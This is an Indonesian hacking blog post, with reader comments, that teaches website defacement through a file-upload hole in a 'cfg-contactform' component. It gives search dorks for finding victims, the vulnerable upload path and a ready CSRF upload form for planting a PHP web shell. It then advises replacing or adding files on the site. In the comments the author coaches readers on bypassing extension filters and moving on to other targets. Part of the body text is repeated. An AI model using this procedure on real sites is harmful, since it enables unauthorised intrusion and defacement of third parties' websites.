Hello World; Pagi Fans, Please Say Hello Haters :*
yoeeh Gengs, Lanjut lagii Walking Blog :D ,karna ini hari sabtu, jadi Gua Post artikelnya pagi, karena Nanti malem mau malmingan gengs :'v wkkwkw.
Kali ini Nue akan Share Tutorial Deface dengan eXploit CFG-CONTACTFORM VULNERABILITY FILE UPLOAD.
Iseng2 Share eXploit Lawas, kali aja masihcrootz xixixhihi, btw Sekalian nyicipin WebShell BACKBOX INDONESIA WEB SHELL V1.0 (BASED ON INDOXPLOIT SHELL) dari Kang hightech.
Dork:
"/cfg-contactform-1/"
"/cfg-contactform-2/"
# Disini exploitnya tergantung contact form yg keberapa mas bro,
/[path]/cfg-contactform-1/inc/upload.php
1. Dorking menggunakan Search Engine
2. pilih salah satu web yg pen ditusb0l, Lalu masukan exploitnya.
cth: target.coli/cfg-contactform-1/inc/upload.php
3. Vulnerability ~ {"filename":" -001."}
CSRF Upload:
<form enctype="multipart/form-data"
action="target" method="post">
<input type="text" name="folder" value="./" /><br />
Please choose a file: <input name="Filedata" type="file" /><br />
<input type="submit" value="upload" />
</form>
*copy CSRF Upload nya, edit dan masukan target lu di "target", save dgn ekstensi .html
*Lalu buka dgn browser
4. Lalu Upload Shell Lu, Jika sukses akan Muncul nama Shell Lu.
5. Shell Akses:/[path]/cfg-contactform-1/upload/namashell.php
*trgantung Dork yg digunakan BossQ ;3
untuk code PHP disini
Nah kalo dah masuk ke shell, seterah dah sobat mo apain, bedah isi ampe usus2nya kek.
kalo mau deface saya sarankan nitip file aja yak, kalo mau nebas index (JANGAN LUPA DI BACK UP DUANCOK :) ))
Jadilah Dispenser yg Baik, saat anda berhasil MengEksploitasi suatu web, Usahakan laporkan Bug, dan kalo bisa sih bantu Patch secara Sukarela *Tetap hargai karya para WebMaster ;*
"Tidak semua website bisa di eksploitasi dgn teknik ini, harap selalu mencari dan mencoba! karena dalam dunia Hacking tidak ada yg instants dan bisa berhasil dengan mudah! Mereka yg berhasil adalah mereka yg selalu sabar berusaha dan terus mencoba!"
Btw yuk up2date tentang TKJ Cyber Art, di Official Account Line Kami: http://line.me/ti/p/%40hjl8740i
*bebas utk bertanya *sharing bareng *kepo2deh akwkwa #joinUs
Source and thanks to:haurgeulis Security
./Nuenomaru
Visit and follow :
yoeeh Gengs, Lanjut lagii Walking Blog :D ,karna ini hari sabtu, jadi Gua Post artikelnya pagi, karena Nanti malem mau malmingan gengs :'v wkkwkw.
Kali ini Nue akan Share Tutorial Deface dengan eXploit CFG-CONTACTFORM VULNERABILITY FILE UPLOAD.
Iseng2 Share eXploit Lawas, kali aja masih
Play with Me , Baby <3
Dork:
"/cfg-contactform-1/"
"/cfg-contactform-2/"
(Selebihnya kebangin lg menggunakan imajinasi vokepers kalian, biar dpt yg vuln n verawan)
# Disini exploitnya tergantung contact form yg keberapa mas bro,
/[path]/cfg-contactform-1/inc/upload.php
1. Dorking menggunakan Search Engine
2. pilih salah satu web yg pen ditusb0l, Lalu masukan exploitnya.
cth: target.coli/cfg-contactform-1/inc/upload.php
3. Vulnerability ~ {"filename":" -001."}
CSRF Upload:
<form enctype="multipart/form-data"
action="target" method="post">
<input type="text" name="folder" value="./" /><br />
Please choose a file: <input name="Filedata" type="file" /><br />
<input type="submit" value="upload" />
</form>
*copy CSRF Upload nya, edit dan masukan target lu di "target", save dgn ekstensi .html
*Lalu buka dgn browser
4. Lalu Upload Shell Lu, Jika sukses akan Muncul nama Shell Lu.
bukan tukang PhP kok girls :'v wkkw |
*trgantung Dork yg digunakan BossQ ;3
untuk code PHP disini
Nah kalo dah masuk ke shell, seterah dah sobat mo apain, bedah isi ampe usus2nya kek.
kalo mau deface saya sarankan nitip file aja yak, kalo mau nebas index (JANGAN LUPA DI BACK UP DUANCOK :) ))
Jadilah Dispenser yg Baik, saat anda berhasil MengEksploitasi suatu web, Usahakan laporkan Bug, dan kalo bisa sih bantu Patch secara Sukarela *Tetap hargai karya para WebMaster ;*
"Tidak semua website bisa di eksploitasi dgn teknik ini, harap selalu mencari dan mencoba! karena dalam dunia Hacking tidak ada yg instants dan bisa berhasil dengan mudah! Mereka yg berhasil adalah mereka yg selalu sabar berusaha dan terus mencoba!"
Btw yuk up2date tentang TKJ Cyber Art, di Official Account Line Kami: http://line.me/ti/p/%40hjl8740i
*bebas utk bertanya *sharing bareng *kepo2deh akwkwa #joinUs
Mudahkan x_O ?
Stay Cool and Keep ./Crotz , gaes <(")
bila ada kesalahan mohon di maafkan dan dibenarkan di kolom komentar kak.
bila ada kritik, dan pertanyaan langsung aja kak ke wall fanspage kami: TKJ CYBER ART
Nue cuma niat untuk Share Tutorial, yg bertujuan utk membantu para pemula kek Nue :')
Happy Joomla Hacked~
Sekian dan semoga bermanfaat .. terimakasih
bila ada kritik, dan pertanyaan langsung aja kak ke wall fanspage kami: TKJ CYBER ART
Nue cuma niat untuk Share Tutorial, yg bertujuan utk membantu para pemula kek Nue :')
Happy Joomla Hacked~
Sekian dan semoga bermanfaat .. terimakasih
Source and thanks to:haurgeulis Security
./Nuenomaru
tidak perlu muncul ke permukaan , yang penting tetap bergerilya |
Visit and follow :
FP : TKJ Cyber Art
G+ : TKJ Cyber Art
youtube : TKJ Cyber Art
BBM : C0018D1A2
Line : http://line.me/ti/p/%40hjl8740i
13 comments
Mas, saya belum ngerti apa itu [path].
Bisa di jelasin ?
aduh gimane ya jelasinnya, path itu dir yg ada di web..
salah satu contohny misalkan : config
target.com/path/exploitnya..
target/config//cfg-contactform-1/inc/upload.php <- cuma contoh, *path itu macem2 trgantung web targetnya.
ada juga yang gak make path,
jadi: targetlink/exploit <- gini yg gak make path
tinggal coba2 aja mz, kalo vuln ya langsung exploitasi :)
#Nuenomaru
okw gan :)
siap bang hahha
#Nuenomaru
cara upload shell gimana
itu kan ada csrf upload nya om,, langsung bae masukin shell ente disitu, coba baca step by step nya alon2 hihihih :D
sukses trs deh gan
#Nuenomaru
kalo cuma {"filename":""} gk vuln ya gan?
dicoba aja gan, sekalian coba2 bypass ekstensi shell nya
#Nuenomaru
Gan Gua Ada Banyak Shell Sapa Tau Mau my blog : http://zakirblogger.blogspot.com/ , jangan lupa berkunjung gan
oke tq om.
keep share yoo..
#Nuenomaru
om ane pas upload dah sucses tapi pas shell nya di panggil malah kgk muncul alias direct ke web solusi min ? :p
cari target laen dl yaw hihih
#Nuenomaru
Code php itu maksud nya buat code buat csrf upload file yg ext.php ya ??
EmoticonEmoticon